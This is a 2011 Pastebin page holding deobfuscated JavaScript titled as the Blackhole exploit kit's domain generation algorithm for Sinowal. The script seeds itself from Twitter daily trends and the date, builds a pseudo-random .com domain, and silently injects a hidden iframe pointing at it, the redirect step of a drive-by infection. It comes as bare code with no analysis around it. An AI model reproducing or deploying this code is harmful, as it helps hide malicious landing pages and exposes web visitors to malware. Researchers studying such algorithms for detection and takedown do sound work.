API tools faq
paste
Advertisement
Guest User

Blackhole exploit kit domain generation algorithm of SInowal

a guest
Jul 14th, 2011
1,554
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 4.06 KB | None | 0 0
raw download clone embed print report
  1.  a=5;
  2.  kx_rg=function(x)
  3.  {
  4.    kx_s.kx_t=x;
  5.    var d=new Date();
  6.    d.setTime(kx_D(x));
  7.    var kx_k=d.getUTCHours();
  8.    kx_s.kx_k=kx_k;
  9.    if(kx_k>8)
  10.    {
  11.      d.setUTCDate(d.getUTCDate()-2)
  12.    }
  13.    else
  14.    {
  15.      d.setUTCDate(d.getUTCDate()-3)
  16.    };
  17.    kx_s.kx_E=d;
  18.    var kx_K=[];
  19.    var kx_a="";
  20.    kx_K["kx_g"]=d.getUTCFullYear();
  21.    kx_K["kx_J"]=d.getUTCMonth()+1;
  22.    kx_K["kx_v"]=d.getUTCDate();
  23.    if(d.getUTCMonth()+1<10)
  24.    {
  25.      kx_a=kx_K["kx_g"]+"-0"+(d.getUTCMonth()+1)
  26.    }
  27.    else
  28.    {
  29.      kx_a=kx_K["kx_g"]+"-"+(d.getUTCMonth()+1)
  30.    }
  31.    if(d.getUTCDate()<10)
  32.    {
  33.      kx_a=kx_a+"-0"+d.getUTCDate()
  34.    }
  35.    else
  36.    {
  37.      kx_a=kx_a+"-"+d.getUTCDate()
  38.    }
  39.    setTimeout((function(kx_a)
  40.    {
  41.      return function()
  42.      {
  43.        var kx_P=kx_A('script');
  44.        var kx_m=Math.random().toString();
  45.        kx_P.setAttribute('src',"http://api.twitter.com/1/trends/daily.json?date="+kx_a+"&callback=window.kx_rN&rnd="+kx_m);
  46.        kx_B.appendChild(kx_P)
  47.      }
  48.    }
  49.    )(kx_a),1900)
  50.  };
  51.  window.kx_rg=kx_rg;
  52.  kx_D=function(kx_x)
  53.  {
  54.    return kx_x.as_of*1000
  55.  };
  56.  kx_rN=function(x)
  57.  {
  58.    kx_s.kx_f=x;
  59.    g()
  60.  };
  61.  window.kx_rN=kx_rN;
  62.  g=function()
  63.  {
  64.    var kx_a=0;
  65.    var kx_h=kx_f.trends;
  66.    var kx_rz=kx_s.offset2||23;
  67.    for(var i in kx_h)
  68.    {
  69.      kx_G=function(kx_i)
  70.      {
  71.        return kx_h[i][kx_i].query
  72.      };
  73.      if(kx_k>8&&kx_k<21&&i.indexOf(' 07')>-1)
  74.      {
  75.        kx_a=kx_G(4).charCodeAt(1)+kx_G(4).length;
  76.        break
  77.      }
  78.      else if((kx_k<9||kx_k>20)&&i.indexOf(' 18')>-1)
  79.      {
  80.        kx_a=kx_G(4).charCodeAt(1)+10+kx_G(4).length;
  81.        break
  82.      }
  83.    }
  84.    if(kx_a==0)
  85.    {
  86.      kx_a=kx_h[i][6].query.charCodeAt(1)+7+kx_h[i][6].query.length
  87.    }
  88.    if(kx_a>0)
  89.    {
  90.      var kx_j=new Array();
  91.      kx_j['kx_g']=kx_E.getUTCFullYear();
  92.      kx_j['kx_J']=kx_E.getUTCMonth()+1;
  93.      kx_j['kx_v']=kx_E.getUTCDate();
  94.      var kx_y=new Array('dbs','ytn','vmt','vmr','mlc','oxk','fds','bvf','yus','mcp','ncz','gdw');
  95.      var kx_o=new Array('a','b','c','d','e','f','g','h','j','i','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');
  96.      var kx_L=new Array(3,2,1,4,5,6,7,8,9);
  97.      kx_rt=function(kx_S,kx_e,kx_N,kx_d)
  98.      {
  99.        return(((kx_N+(kx_d*kx_S))+(kx_e^kx_S)*kx_d)+kx_S)
  100.      };
  101.      var kx_r,kx_z,kx_q,kx_b,kx_u;
  102.      var kx_rr=kx_s.offset||125;
  103.      kx_u=kx_rt(kx_j['kx_v'],kx_j['kx_J'],kx_j['kx_g'],kx_a)+kx_rr;
  104.      kx_r=kx_o[(((kx_j['kx_g']&0xAA)+kx_u)%63)%26]+kx_o[(((kx_j['kx_g']&0xAA)<<2)+kx_u)%kx_rz];
  105.      kx_z=kx_o[((((kx_j['kx_g']&0x3311)>>3)+kx_u)%10)]+kx_o[((((kx_j['kx_g']&0x3311)>>4)+kx_u)%10)];
  106.      kx_q=kx_o[((kx_j['kx_J']+kx_u)%kx_rz)]+kx_o[((kx_j['kx_J']*kx_u)%kx_rz)];
  107.      kx_b=kx_o[((kx_j['kx_v']*6)%27)];
  108.      kx_R=kx_b=kx_o[((kx_j['kx_v']*kx_u)%24)];
  109.      var kx_rs=[81,85,74,74,92,17,82,73,80,30,82,77,25,11,10,10,61,11,56,55,11,53,6,53,7,2,1,0,48];
  110.      for(var i=0;i<kx_rs.length;i++)
  111.      {
  112.        kx_rs[i]=String.fromCharCode(i+kx_rs[i]+24)
  113.      }
  114.      var r='http://'+kx_b+kx_z+kx_q+kx_r+kx_R+kx_y[kx_j['kx_J']-1]+'.com/'+kx_rs.join('');
  115.      kx_C(kx_T.getElementById('d3'),'<div style="visibility:hidden"><iframe src="'+r+'" width=100 height=80></iframe></div>')
  116.    }
  117.  };
  118.  kx_A=function(kx_c)
  119.  {
  120.    return kx_T.createElement(kx_c)
  121.  };
  122.  kx_C=function(kx_M,kx_p)
  123.  {
  124.    kx_M.innerHTML=kx_p
  125.  };
  126.  kx_rx=function()
  127.  {
  128.    if(!window.iframeLoaded)
  129.    {
  130.      if(document.body==null)
  131.      {
  132.        setTimeout(kx_rx,200)
  133.      }
  134.      else
  135.      {
  136.        window.kx_s=window;
  137.        window.kx_s.iframeLoaded=true;
  138.        window.kx_w=document.body;
  139.        window.kx_T=document;
  140.        var kx_H=kx_A('div');
  141.        kx_C(kx_H,'<div id="d3" style="display:none;visibility:hidden;"></div>');
  142.        kx_w.appendChild(kx_H);
  143.        var kx_n=kx_A('script');
  144.        kx_s.kx_B=kx_T.getElementsByTagName('head')[0];
  145.        var kx_F=Math.random().toString();
  146.        kx_n.setAttribute('src',"http://api.twitter.com/1/trends/daily.json?callback=window.kx_rg&rnd="+kx_F);
  147.        kx_B.appendChild(kx_n)
  148.      }
  149.    }
  150.  };
  151.  window.kx_rx=kx_rx;
  152.  kx_rx()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!